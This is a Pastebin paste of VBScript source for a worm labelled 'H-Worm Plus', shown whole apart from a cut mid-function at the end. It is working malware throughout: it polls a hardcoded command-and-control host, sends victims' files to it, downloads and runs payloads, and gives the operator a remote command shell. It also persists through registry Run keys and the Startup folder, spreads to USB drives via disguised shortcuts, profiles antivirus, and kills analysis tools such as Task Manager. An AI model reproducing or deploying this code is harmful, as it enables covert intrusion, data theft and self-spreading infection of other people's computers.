Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- "'<[ >> H-Worm Plus | ReNEW version by MeoIT << ]>
- ' <[ Add Functions and fixed some place ]>
- '<[ >> CREDIT and THANKS: njQ8, Houdini and me :) << ]>
- SET_THUMUC_CAIDAT_SAU = "%appdata%"
- dim OBJ_WS_SHELL
- set OBJ_WS_SHELL = wscript.createobject("wscript.shell")
- dim OBJ_HE_THONG_TAPTIN
- set OBJ_HE_THONG_TAPTIN = createobject("scripting.filesystemobject")
- dim MANG_CUA_TUI
- set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
- TEN_SAU_CAI_DAT = wscript.scriptname
- DUONG_DAN_SSTTAARRTTUUPP = OBJ_WS_SHELL.specialfolders ("startup") & "\"
- THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings(SET_THUMUC_CAIDAT_SAU) & "\"
- dim OBJ_SYS_ENV,OBJ_USER_ENV
- dim STR_DUONG_DAN_USER_TEMP
- dim STR_DUONG_DAN_SYS_TEMP
- dim STR_USER_PROFILE,STR_THU_MUC_FILE_TAM_IE
- set OBJ_SYS_ENV = OBJ_WS_SHELL.Environment("System")
- set OBJ_USER_ENV = OBJ_WS_SHELL.Environment("User")
- STR_DUONG_DAN_USER_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
- STR_DUONG_DAN_SYS_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
- STR_USER_PROFILE = OBJ_WS_SHELL.ExpandEnvironmentStrings("%userprofile%")
- if not OBJ_HE_THONG_TAPTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings("%temp%") & "\"
- BO_CHIA_KY_TU = "<|>"
- THOI_GIAN_NGU = 4915
- dim KET_NOI_DA_SAN_SANG
- dim LENH_THUC_THI
- dim THONG_SO_CHO_LENH_THUC_THI
- CO_HAY_KHONG_TU_USB = ""
- dim LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT
- startdate = ""
- info = ""
- DIA_CHI_IP_KET_NOI = "shkis.publicvm.com"
- CONG_KET_NOI = 83
- BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB = false
- BAT_TAT_LAY_LAN_LINK_THU_MUC_USB = false
- on error resume next
- BAT_DAU_CHAY_HAM
- while true
- CHONG_CAC_PROC
- CAI_DAT_VAO_USB_THU_MUC_USB
- KET_NOI_DA_SAN_SANG = ""
- KET_NOI_DA_SAN_SANG = THANK_GOD_YOU_ARE_HERE("is-ready","")
- LENH_THUC_THI = split(KET_NOI_DA_SAN_SANG,BO_CHIA_KY_TU)
- select case LENH_THUC_THI(0)
- Case "excecute"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- execute THONG_SO_CHO_LENH_THUC_THI
- case "update"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
- set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,2,false,-1)
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.write THONG_SO_CHO_LENH_THUC_THI
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
- OBJ_WS_SHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chr(34)
- wscript.quit
- Case "uninstall"
- GO_BO_SUB
- case "send"
- DUA_FILE_LEN_VIC_ROI_CHAY_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
- Case "site-send"
- LAY_FILE_THEO_URL_VA_THUC_THI_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
- case "recv"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- LAY_FILE_VE_NHA_QUANLYFILE_HAM (THONG_SO_CHO_LENH_THUC_THI)
- Case "enum-driver"
- THANK_GOD_YOU_ARE_HERE "is-enum-driver",LAY_THONG_TIN_CAC_O_DIA_HAM
- case "enum-faf"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- THANK_GOD_YOU_ARE_HERE "is-enum-faf",LAY_THONG_TIN_THU_MUC_HAM(THONG_SO_CHO_LENH_THUC_THI)
- Case "enum-process"
- THANK_GOD_YOU_ARE_HERE "is-enum-process",LAY_TTIN_CAC_TIEN_TRINH_HAM
- case "cmd-shell"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- THANK_GOD_YOU_ARE_HERE "is-cmd-shell",DIEU_KHIEN_CMD_HAM(THONG_SO_CHO_LENH_THUC_THI)
- Case "delete"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- XOA_TAP_TIN_VA_THU_MUC_SUB (THONG_SO_CHO_LENH_THUC_THI)
- case "exit-process"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- TAT_TIEN_TRINH_SUB (THONG_SO_CHO_LENH_THUC_THI)
- Case "sleep"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- THOI_GIAN_NGU = eval(THONG_SO_CHO_LENH_THUC_THI)
- end select
- wscript.sleep THOI_GIAN_NGU
- wend
- function BAT_DAU_CHAY_HAM
- on error resume next
- CO_HAY_KHONG_TU_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\")
- if CO_HAY_KHONG_TU_USB = "" then
- if lcase(mid(wscript.scriptfullname,2)) = ":\" & lcase(TEN_SAU_CAI_DAT) then
- CO_HAY_KHONG_TU_USB = "true - " & date
- OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
- else
- CO_HAY_KHONG_TU_USB = "false - " & date
- OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
- end if
- end if
- CAI_DAT_VAO_MAY_SUB
- set RUT_GON_FNAME = OBJ_HE_THONG_TAPTIN.getfile(wscript.scriptfullname)
- set RUT_GON_FNAME_CAI = OBJ_HE_THONG_TAPTIN.getfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT)
- if lcase(RUT_GON_FNAME.shortpath) <> lcase(RUT_GON_FNAME_CAI.shortpath) then
- end if
- err.clear
- set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,8,false,-1)
- if err.number > 0 then wscript.quit
- end function
- sub CAI_DAT_VAO_MAY_SUB()
- on error resume next
- CHUOI_PC = "."
- set DT_WIN_MGR = GetObject("winmgmts:" _
- & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
- set TIEN_TRINH_KO_CAI_NOT_RUN = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'filemonitor.exe'")
- if TIEN_TRINH_KO_CAI_NOT_RUN.Count = 1 then
- wscript.quit
- end if
- OBJ_WS_SHELL.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
- OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
- OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,true
- OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
- OBJ_HE_THONG_TAPTIN.GetFile(DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT).Attributes=2+4
- OBJ_HE_THONG_TAPTIN.GetFile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT).Attributes=2+4
- if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" Then
- OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
- end if
- XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_USER_TEMP
- XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_SYS_TEMP
- STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
- STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
- XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
- end sub
- sub CAI_DAT_VAO_USB_THU_MUC_USB
- on error resume next
- dim BO_TAO_LOI_TAT
- dim TEN_FILE_TRONG_USB
- dim TEN_THU_MUC_TRONG_USB
- dim BIEU_TUONG_LINK_FILE_TRONG_USB
- dim BIEU_TUONG_THU_MUC_TRONG_USB
- CAI_DAT_VAO_MAY_SUB
- for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- if CAC_USB.drivetype = 1 then
- OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname, CAC_USB.path & "\" & TEN_SAU_CAI_DAT,true
- if OBJ_HE_THONG_TAPTIN.fileexists(CAC_USB.path & "\" & TEN_SAU_CAI_DAT) then
- OBJ_HE_THONG_TAPTIN.getfile(CAC_USB.path & "\" & TEN_SAU_CAI_DAT).attributes = 2+4
- end if
- for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").Files
- if not BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB then exit for
- TAP_TIN_DA_CO_TRONG_USB.attributes=0
- if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
- if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".") (ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
- TAP_TIN_DA_CO_TRONG_USB.attributes = 2+4
- if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
- TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
- set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_TRONG_USB (0) & ".lnk")
- BO_TAO_LOI_TAT.windowstyle = 7
- BO_TAO_LOI_TAT.targetpath = "cmd.exe"
- BO_TAO_LOI_TAT.workingdirectory = ""
- BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAP_TIN_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- BIEU_TUONG_LINK_FILE_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\" & OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\." & split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))& "\") & "\defaulticon\")
- if instr(BIEU_TUONG_LINK_FILE_TRONG_USB,",") = 0 then
- BO_TAO_LOI_TAT.iconlocation = TAP_TIN_DA_CO_TRONG_USB.path
- else
- BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_LINK_FILE_TRONG_USB
- end if
- BO_TAO_LOI_TAT.save()
- end if
- end if
- end if
- next
- for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\" ).subfolders
- if not BAT_TAT_LAY_LAN_LINK_THU_MUC_USB then exit for
- THU_MUC_DA_CO_TRONG_USB.attributes = 2+4
- TEN_THU_MUC_TRONG_USB = THU_MUC_DA_CO_TRONG_USB.name
- set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_THU_MUC_TRONG_USB & ".lnk")
- BO_TAO_LOI_TAT.windowstyle = 7
- BO_TAO_LOI_TAT.targetpath = "cmd.exe"
- BO_TAO_LOI_TAT.workingdirectory = ""
- BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THU_MUC_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- BIEU_TUONG_THU_MUC_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr(BIEU_TUONG_THU_MUC_TRONG_USB,",") = 0 then
- BO_TAO_LOI_TAT.iconlocation = THU_MUC_DA_CO_TRONG_USB.path
- else
- BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_THU_MUC_TRONG_USB
- end if
- BO_TAO_LOI_TAT.save()
- next
- end if
- end if
- end if
- next
- err.clear
- end sub
- sub GO_BO_SUB
- on error resume next
- dim TEN_FILE_TRONG_USB
- OBJ_HE_THONG_TAPTIN.GetFile(wscript.scriptfullname).Attributes=0
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
- OBJ_WS_SHELL.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
- OBJ_WS_SHELL.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
- OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
- OBJ_HE_THONG_TAPTIN.deletefile THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT
- OBJ_HE_THONG_TAPTIN.deletefile wscript.scriptfullname,true
- if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" then
- OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
- end if
- XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_USER_TEMP
- XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_SYS_TEMP
- STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
- STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
- XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
- for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- if CAC_USB.drivetype = 1 then
- for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").files
- on error resume next
- if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
- if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
- TAP_TIN_DA_CO_TRONG_USB.attributes = 0
- if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
- TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
- OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_TRONG_USB(0) & ".lnk")
- else
- OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TAP_TIN_DA_CO_TRONG_USB.name)
- end if
- else
- OBJ_HE_THONG_TAPTIN.deletefile(TAP_TIN_DA_CO_TRONG_USB.path)
- end if
- end if
- OBJ_HE_THONG_TAPTIN.DeleteFile wscript.scriptfullname,true
- next
- for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").subfolders
- THU_MUC_DA_CO_TRONG_USB.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- function THANK_GOD_YOU_ARE_HERE(LENH_THUC_THI,THONG_SO_CHO_LENH_THUC_THI)
- THANK_GOD_YOU_ARE_HERE = THONG_SO_CHO_LENH_THUC_THI
- MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/" & LENH_THUC_THI, false
- MANG_CUA_TUI.setrequestheader "user-agent:",HAM_TAP_HOP_CAC_INFOR
- MANG_CUA_TUI.send THONG_SO_CHO_LENH_THUC_THI
- THANK_GOD_YOU_ARE_HERE = MANG_CUA_TUI.responsetext
- end function
- sub LAY_FILE_THEO_URL_VA_THUC_THI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
- CHUOI_LIEN_KET = URL_CHUA_FILE
- CHUOI_DAT_FILE_VAO_DAU = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\" & TEN_FILE_GUI_URL
- set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
- OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIEN_KET, false
- OBJ_LAY_FILE_URL_VA_CHAY.send
- set OBJ_HE_THONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
- if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
- end if
- if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
- dim ADO_TAI_URL_CHAY
- set ADO_TAI_URL_CHAY = createobject("adodb.stream")
- with ADO_TAI_URL_CHAY
- .type = 1
- .open
- .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
- .savetofile CHUOI_DAT_FILE_VAO_DAU
- .close
- end with
- set ADO_TAI_URL_CHAY = nothing
- end if
- if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
- end if
- end sub
- sub DUA_FILE_LEN_VIC_ROI_CHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
- if THU_MUC_VIC_NHAN = "" then
- THU_MUC_VIC_NHAN = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\"
- end if
- CHUOI_DAT_FILE_VAO_DAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
- set OBJ_DUA_FILE_LEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
- OBJ_DUA_FILE_LEN_VIC_VA_CHAY.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-sending" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
- OBJ_DUA_FILE_LEN_VIC_VA_CHAY.send ""
- set OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN = createobject("scripting.filesystemobject")
- if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
- end if
- if OBJ_DUA_FILE_LEN_VIC_VA_CHAY.status = 200 then
- dim ADO_TAI_DISKFILE_LEN_VA_CHAY
- set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
- with ADO_TAI_DISKFILE_LEN_VA_CHAY
- .type = 1
- .open
- .write OBJ_DUA_FILE_LEN_VIC_VA_CHAY.responsebody
- .savetofile CHUOI_DAT_FILE_VAO_DAU
- .close
- end with
- set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
- end if
- if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
- end if
- end sub
- function LAY_FILE_VE_NHA_QUANLYFILE_HAM(URL_CHUA_FILE)
- dim MANG_CUA_TUI,ADO_LAY_FILE_VE_NHA,BO_DEM_BUF_LAY_FILE_VE_NHA
- set ADO_LAY_FILE_VE_NHA = createobject("adodb.stream")
- with ADO_LAY_FILE_VE_NHA
- .type = 1
- .open
- .loadfromfile URL_CHUA_FILE
- BO_DEM_BUF_LAY_FILE_VE_NHA = .read
- .close
- end with
- set ADO_LAY_FILE_VE_NHA = nothing
- set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
- MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-recving" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
- MANG_CUA_TUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
- end function
- function LAY_THONG_TIN_CAC_O_DIA_HAM()
- for each CAC_HDD_USB_DVD_CD in OBJ_HE_THONG_TAPTIN.drives
- if CAC_HDD_USB_DVD_CD.isready = true then
- LAY_THONG_TIN_CAC_O_DIA_HAM = LAY_THONG_TIN_CAC_O_DIA_HAM & CAC_HDD_USB_DVD_CD.path & "|" & CAC_HDD_USB_DVD_CD.drivetype & BO_CHIA_KY_TU
- end if
- next
- end function
- function LAY_THONG_TIN_THU_MUC_HAM(CAC_THU_MUC_GET_INF)
- LAY_THONG_TIN_THU_MUC_HAM = CAC_THU_MUC_GET_INF & BO_CHIA_KY_TU
- for each THU_MUC_DA_CO_TRONG_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).subfolders
- LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & THU_MUC_DA_CO_TRONG_MACHINE.name & "||d|" & THU_MUC_DA_CO_TRONG_MACHINE.attributes & BO_CHIA_KY_TU
- next
- for each TTIN_DA_CO_IN_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).files
- LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & TTIN_DA_CO_IN_MACHINE.name & "|" & TTIN_DA_CO_IN_MACHINE.size & "|f|" & TTIN_DA_CO_IN_MACHINE.attributes & BO_CHIA_KY_TU
- next
- end function
- function LAY_TTIN_CAC_TIEN_TRINH_HAM()
- on error resume next
- set OBJ_WMI_SER_PROC = getobject("winmgmts:\\.\root\cimv2")
- set CAC_DT_THEO_COT_PROC = OBJ_WMI_SER_PROC.execquery("select * from win32_process",,48)
- dim DT_PROC
- for each DT_PROC in CAC_DT_THEO_COT_PROC
- LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.name & "|"
- LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.processid & "|"
- LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.executablepath & BO_CHIA_KY_TU
- next
- end function
- sub TAT_TIEN_TRINH_SUB(MA_SO_TIEN_TRINH)
- on error resume next
- OBJ_WS_SHELL.run "taskkill /F /T /PID " & MA_SO_TIEN_TRINH,7,true
- end sub
- sub XOA_TAP_TIN_VA_THU_MUC_SUB(DUONG_DAN_FILE_OR_THU_MUC)
- on error resume next
- OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_FILE_OR_THU_MUC,true
- OBJ_HE_THONG_TAPTIN.deletefolder DUONG_DAN_FILE_OR_THU_MUC,true
- end sub
- function DIEU_KHIEN_CMD_HAM(LENH_THUC_THI)
- dim MANG_CUA_TUI,OBJ_WS_SHELL_EXECU,DOC_DATA_SHELL_OUT
- set OBJ_WS_SHELL_EXECU = OBJ_WS_SHELL.exec("%comspec% /c " & LENH_THUC_THI)
- if not OBJ_WS_SHELL_EXECU.stdout.atendofstream then
- DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stdout.readall
- elseif not OBJ_WS_SHELL_EXECU.stderr.atendofstream then
- DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stderr.readall
- else
- DOC_DATA_SHELL_OUT = ""
- end if
- DIEU_KHIEN_CMD_HAM = DOC_DATA_SHELL_OUT
- end function
- function HAM_TAP_HOP_CAC_INFOR
- on error resume next
- if inf = "" then
- inf = HAM_LAY_TEN_VIC_THEO_MA_HW & BO_CHIA_KY_TU
- inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%computername%") & BO_CHIA_KY_TU
- inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%username%") & BO_CHIA_KY_TU
- set RT_INF = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set HDH = RT_INF.execquery("select * from win32_operatingsystem")
- for each TEN_HDH in HDH
- inf = inf & TEN_HDH.caption & BO_CHIA_KY_TU
- exit for
- next
- inf = inf & "plus" & BO_CHIA_KY_TU
- inf = inf & HAM_LAY_TEN_TRINH_AV & BO_CHIA_KY_TU
- inf = inf & CO_HAY_KHONG_TU_USB
- HAM_TAP_HOP_CAC_INFOR = inf
- else
- HAM_TAP_HOP_CAC_INFOR = inf
- end if
- end function
- function HAM_LAY_TEN_VIC_THEO_MA_HW
- on error resume next
- if not OBJ_HE_THONG_TAPTIN.FolderExists(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe") then OBJ_HE_THONG_TAPTIN.CreateFolder(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe")
- set RT_TEN_MACHINE = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set CAC_HDD = RT_TEN_MACHINE.execquery ("select * from win32_logicaldisk")
- for each O_DIA_CUNG_SSD in CAC_HDD
- if O_DIA_CUNG_SSD.volumeserialnumber <> "" then
- HAM_LAY_TEN_VIC_THEO_MA_HW = O_DIA_CUNG_SSD.volumeserialnumber & " | MeoIT"
- exit for
- end if
- next
- end function
- function HAM_LAY_TEN_TRINH_AV
- on error resume next
- HAM_LAY_TEN_TRINH_AV = ""
- set OBJ_WMI_HDH = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set CAC_DT_THEO_COT_HDH = OBJ_WMI_HDH.execquery("select * from win32_operatingsystem",,48)
- for each DT_AV in CAC_DT_THEO_COT_HDH
- PHIEN_BAN_AV = split(DT_AV.version,".")
- next
- PHIEN_BAN_AV = split(CAC_DT_THEO_COT_HDH.version,".")
- PHIEN_BAN_HDH = PHIEN_BAN_AV (0) & "."
- for x = 1 to ubound(PHIEN_BAN_AV)
- PHIEN_BAN_HDH = PHIEN_BAN_HDH & PHIEN_BAN_AV(i)
- next
- PHIEN_BAN_HDH = eval(PHIEN_BAN_HDH)
- if PHIEN_BAN_HDH > 6 then TRUNG_TAM_SECU = "securitycenter2" else TRUNG_TAM_SECU = "securitycenter"
- set DT_TRUNG_TAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNG_TAM_SECU)
- set COT_AV = DT_TRUNG_TAM_SECU.execquery("select * from antivirusproduct","wql",0)
- for each TEN_AV in COT_AV
- HAM_LAY_TEN_TRINH_AV = HAM_LAY_TEN_TRINH_AV & TEN_AV.displayname & " ."
- next
- if HAM_LAY_TEN_TRINH_AV = "" then HAM_LAY_TEN_TRINH_AV = "None AV"
- end function
- sub CHONG_CAC_PROC
- on error resume next
- CHUOI_PC = "."
- set DT_WIN_MGR = GetObject("winmgmts:" _
- & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
- set TTR_MOT = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'taskmgr.exe'")
- set TTR_HAI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'processhacker.exe'")
- set TTR_BA = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'procexp.exe'")
- set TTR_BON = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'apatedns.exe'")
- set TTR_NAM = DT_WIN_MGR.ExecQuery _
